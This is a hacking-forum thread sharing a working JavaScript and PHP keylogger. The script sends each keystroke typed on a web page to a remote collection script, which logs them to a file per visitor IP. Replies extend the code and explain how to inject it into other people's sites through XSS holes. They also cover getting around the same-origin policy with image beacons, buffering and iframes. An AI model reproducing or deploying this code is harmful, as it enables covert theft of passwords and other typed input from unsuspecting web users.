16 replies to this topic

[METAHUMAN]

Not my stuff. Found else where. Posting here.

Keylogger.JS

function whichButton(event)
{
var keya = "";
keya = event.keyCode;
makeRequest('http://site.com/keylogger.php?iambr=' + keya);
}

function makeRequest(url)
{
var httpRequest;

if (window.XMLHttpRequest)
{ // Mozilla, Safari, ...
httpRequest = new XMLHttpRequest();
if (httpRequest.overrideMimeType) {
httpRequest.overrideMimeType('text/xml');
}
} 
else if (window.ActiveXObject)
{ // IE
try
{
httpRequest = new ActiveXObject("Msxml2.XMLHTTP");
} 
catch (e) {
try {
httpRequest = new ActiveXObject("Microsoft.XMLHTTP");
} 
catch (e) {}
}
}

if (!httpRequest)
{
alert('Giving up :( Cannot create an XMLHTTP instance');
return false;
}
httpRequest.onreadystatechange = function() { alertContents(httpRequest); };
httpRequest.open('GET', url, true);
httpRequest.send(null);
}

function alertContents(httpRequest)
{
if (httpRequest.readyState == 4) {
if (httpRequest.status == 200) {
}
else
{
alert('There was a problem with the request.');
}
}
}

Keylogger.PHP

<?php
$_GET['iambr'];
$file = fopen($_SERVER['REMOTE_ADDR'] . ".txt","a");
fwrite($file,$_GET['iambr'] . '||');
fclose($file);
?>

index.htm

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="JavaScript" SRC="keylogger.js"></SCRIPT>
</head>
<body onkeyup="whichButton(event)">
<p><b>Note:</b> Make sure the right frame has focus when trying this example!</p>
<p>Press a key on your keyboard. An alert box will alert the unicode of the key pressed.</p>
</body>
</html>

(:

[raif]

small improvement. it will now do keylogging for firefox(and probably other netscape/mozilla based browsers). and because of the String.fromCharCode it will log the actual letter rather than the ascii code for it.

function whichButton(e)
{
var keya = "";
var isNetscape = (navigator.appName.indexOf("Netscape") != -1);
var keya = (isNetscape) ? String.fromCharCode(e.which) : String.fromCharCode(e.keyCode);
makeRequest('http://site.com/keylogger.php?iambr=' + keya);
}

[setthesun]

I hope you know that it's not gonna work when it's under another domain and throw security error in IE and FF. But still you can use under your own domain.

[raif]

or you can inject the javascript through an xss hole and use it on someone else's domain. but the same domain policy for xmlhttprequest will prevent it from working on more than one at a time.

[setthesun]

Nope, it's not going to work because of same origin policy, and not using a buffer before sending keys is a crazy idea ! Slow and bandwidth / process killer.

So basically this is only useful if you got a website which is already controlled by you.

You can make this work cross-domain though. Simply create new image and modify "src" to your server with required query string (which is including recorded keystrokes), that's it.

And it's a good idea to send this request after a buffer or / and onclose() or similar action.

[raif]

you can make it work on a domain you don't control if you have an iframe that keeps the keylogger going as long as they are on the same domain. and the buffer is a good idea too. have it send the buffered keystrokes onMouseUp like when they click on a link. just inject the javascript code to create the iframe into an xss hole(whether persistent or reflected). and even if this doesn't work on a site that you don't control(which i think it will..) you can find a site where you can inject xss into a database and just inject all the code in there and it'll work. but i think i'm going to try this out just to make sure that it does work.

[t0tum]

small improvement. it will now do keylogging for firefox(and probably other netscape/mozilla based browsers). and because of the String.fromCharCode it will log the actual letter rather than the ascii code for it.

And what would be the one for IE, or preferably both?

[gametricker]

wow, this is amazing.

I have a "method" of showing it on cross-domain, sort of kind of. , if anyone would want to know, they first have to help me develop a way to record button clicks

Cheers,

Edward

[extreme]

What's the purpose of cross domain keyloggin??? It still has to to be inside of iframe/frame that is located on your website,which is very possible to do..

It is more interesting to find out how to send key using javascript :/

BTW, checkout "onkeypress" or something like that since it should return printable character, and not it's ASCII value

[Kaiba]

however, using a frame within another website is forbidden in posts or e-mails , at least for good famous ones.